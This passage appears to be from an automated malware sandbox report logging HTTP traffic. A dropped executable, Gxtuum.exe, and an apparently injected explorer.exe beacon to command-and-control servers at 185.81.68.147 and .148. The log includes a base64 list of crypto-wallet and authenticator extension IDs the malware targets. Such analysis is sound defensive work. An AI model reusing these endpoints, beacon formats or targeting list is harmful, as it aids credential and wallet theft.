                                                                                                                                                                Dec 13, 2024 01:38:01.525351048 CET224INData Raw: 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00 69 00 59 00 32 00 4a 00 71 00 63 00 47 00 4a 00 77 00 5a
                                                                                                                                                                Data Ascii: b2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Np
                                                                                                                                                                Dec 13, 2024 01:38:01.525382996 CET1236INData Raw: 00 61 00 6d 00 35 00 74 00 61 00 47 00 35 00 6d 00 62 00 6d 00 74 00 6b 00 62 00 6d 00 46 00 68 00 5a 00 48 00 78 00 44 00 62 00 32 00 6c 00 75 00 59 00 6d 00 46 00 7a 00 5a 00 51 00 70 00 6d 00 61 00 47 00 4a 00 76 00 61 00 47 00 6c 00 74 00 59
                                                                                                                                                                Data Ascii: am5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb
                                                                                                                                                                Dec 13, 2024 01:38:01.525440931 CET224INData Raw: 00 35 00 68 00 62 00 6d 00 70 00 74 00 5a 00 47 00 74 00 75 00 61 00 47 00 74 00 70 00 62 00 6d 00 6c 00 6d 00 62 00 6d 00 74 00 6e 00 5a 00 47 00 4e 00 6e 00 5a 00 32 00 4e 00 6d 00 62 00 6d 00 68 00 6b 00 59 00 57 00 46 00 74 00 62 00 57 00 31
                                                                                                                                                                Data Ascii: 5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybl
                                                                                                                                                                Dec 13, 2024 01:38:01.525470972 CET1236INData Raw: 00 64 00 68 00 62 00 47 00 78 00 6c 00 64 00 41 00 70 00 6d 00 62 00 6d 00 70 00 6f 00 62 00 57 00 74 00 6f 00 61 00 47 00 31 00 72 00 59 00 6d 00 70 00 72 00 61 00 32 00 46 00 69 00 62 00 6d 00 52 00 6a 00 62 00 6d 00 35 00 76 00 5a 00 32 00 46
                                                                                                                                                                Data Ascii: dhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN
                                                                                                                                                                Dec 13, 2024 01:38:01.525510073 CET1236INData Raw: ab 4b 02 e2 72 1f 8f 57 e3 55 ab 2a 66 eb 28 07 b2 b5 c2 03 2f c5 7b 9a 86 37 08 a5 d3 28 87 f2 30 bf a5 b2 23 03 6a ba 02 16 82 5c ed cf 1c 2b 8a 79 b4 92 a7 07 f2 f0 f3 69 e2 a1 4e da f4 cd 65 05 be d5 06 34 62 1f d1 a6 fe 8a c4 2e 53 9d 34 f3
                                                                                                                                                                Data Ascii: KrWU*f(/{7(0#j\+yiNe4b.S4U2u9`@q^nQ!>=>FMT]qoP`$@CwgB[8y|GB|+H2pZrNl8V=-9'6d\!h[T6.:$gW
                                                                                                                                                                Dec 13, 2024 01:38:01.525564909 CET1236INData Raw: 00 63 00 65 00 73 00 73 00 20 00 57 00 68 00 65 00 72 00 65 00 20 00 53 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 6e 00 66 00 6f 00 65 00 73 00 73 00 69 00 6f 00 6e 00 49 00 64 00 3d 00 27 00 00 00 00 00 00 00 a5 c6 63 63 84 f8 7c 7c 99
                                                                                                                                                                Data Ascii: cess Where SProcessInfoessionId='cc||ww{{kkooTP`00gg}V++bMvvE@}}YYGGAg_E#Srr[u=jL&&Zl66A~??O\h44Q4
                                                                                                                                                                Dec 13, 2024 01:38:01.525599003 CET1236INData Raw: 55 ad 76 6d f6 88 cc 76 91 f5 02 4c 25 4f e5 d7 fc c5 2a cb d7 26 35 44 80 b5 62 a3 8f de b1 5a 49 25 ba 1b 67 45 ea 0e 98 5d fe c0 e1 c3 2f 75 02 81 4c f0 12 8d 46 97 a3 6b d3 f9 c6 03 8f 5f e7 15 92 9c 95 bf 6d 7a eb 95 52 59 da d4 be 83 2d 58
                                                                                                                                                                Data Ascii: UvmvL%O*&5DbZI%gE]/uLFk_mzRY-Xt!Ii)DujyxX>k'qO f}:cJ1Q3`bSEdwk+pHhXElR{s#rKWfU*(/{70(#j\+yNie
                                                                                                                                                                Dec 13, 2024 01:38:01.525634050 CET1236INData Raw: f1 71 93 e2 71 d8 73 ab d8 31 53 62 31 15 3f 2a 15 04 0c 08 04 c7 52 95 c7 23 65 46 23 c3 5e 9d c3 18 28 30 18 96 a1 37 96 05 0f 0a 05 9a b5 2f 9a 07 09 0e 07 12 36 24 12 80 9b 1b 80 e2 3d df e2 eb 26 cd eb 27 69 4e 27 b2 cd 7f b2 75 9f ea 75 09
                                                                                                                                                                Data Ascii: qqs1Sb1?*R#eF#^(07/6$=&'iN'uu,tX,.4-6nnZZ[RR;Mv;a}){R)>/q^/SSh, `@ y[[jjFg9Kr9JJLLXXJk*OCCMM3Uf3E
                                                                                                                                                                Dec 13, 2024 01:38:01.525670052 CET1236INData Raw: 00 62 00 47 00 56 00 30 00 43 00 6d 00 46 00 6c 00 59 00 57 00 4e 00 6f 00 61 00 32 00 35 00 74 00 5a 00 57 00 5a 00 77 00 61 00 47 00 56 00 77 00 59 00 32 00 4e 00 70 00 62 00 32 00 35 00 69 00 62 00 32 00 39 00 6f 00 59 00 32 00 74 00 76 00 62
                                                                                                                                                                Data Ascii: bGV0CmFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfENvaW45OFdhbGxldApjZ2Vlb2RwZmFnamNlZWZpZWZsbWRmcGhwbGtlbmxma3xUb25Dcnlzd
                                                                                                                                                                Dec 13, 2024 01:38:01.645591021 CET1236INData Raw: 00 5a 00 69 00 59 00 32 00 64 00 6e 00 5a 00 6d 00 70 00 6d 00 62 00 6d 00 31 00 38 00 54 00 57 00 46 00 70 00 59 00 58 00 4a 00 45 00 5a 00 55 00 5a 00 70 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 4a 00 6f 00 5a 00 32 00 68
                                                                                                                                                                Data Ascii: ZiY2dnZmpmbm18TWFpYXJEZUZpV2FsbGV0CmJoZ2hvYW1hcGNkcGJvaHBoaWdvb29hZGRpbnBrYmFpfEF1dGhlbnRpY2F0b3IKb29ramxia2lpamluaHBtbmp


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                61192.168.2.549868185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:00.781603098 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:00.901525021 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:02.216494083 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:01 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                62192.168.2.549869185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:00.907602072 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:02.256973982 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:01 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                63192.168.2.549875185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:02.453355074 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:02.574018002 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:04.077234030 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:03 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                64192.168.2.549877185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:03.891496897 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:05.257503033 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:04 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                65192.168.2.549883185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:04.313987017 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:04.433845043 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:05.963036060 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:04 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                66192.168.2.549884185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:04.703943014 CET184OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 32
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 64 31 3d 31 30 30 30 30 38 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                Data Ascii: d1=10000840101&unit=246122658369
                                                                                                                                                                Dec 13, 2024 01:38:06.049526930 CET201INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:05 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e
                                                                                                                                                                Data Ascii: <c>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                67192.168.2.549885185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:06.203608990 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:06.323438883 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:07.893572092 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:06 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                68192.168.2.549891185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:07.500987053 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:08.865362883 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:08 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                69192.168.2.549892185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:07.797480106 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:09.163487911 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:08 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                70192.168.2.549893185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:08.134330034 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:08.255857944 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:09.763339043 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:08 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                71192.168.2.549899185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:10.000058889 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:10.119851112 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:11.473818064 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:10 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                72192.168.2.549900185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:10.502433062 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:11.875880957 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:11 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                73192.168.2.549905185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:10.803453922 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:12.163288116 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:11 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                74192.168.2.549906185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:11.703921080 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:11.823878050 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:13.141201019 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:12 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                75192.168.2.549912185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:13.375853062 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:13.497446060 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:14.848855972 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:14 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                76192.168.2.549913185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:13.627343893 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:14.974706888 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:14 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                77192.168.2.549914185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
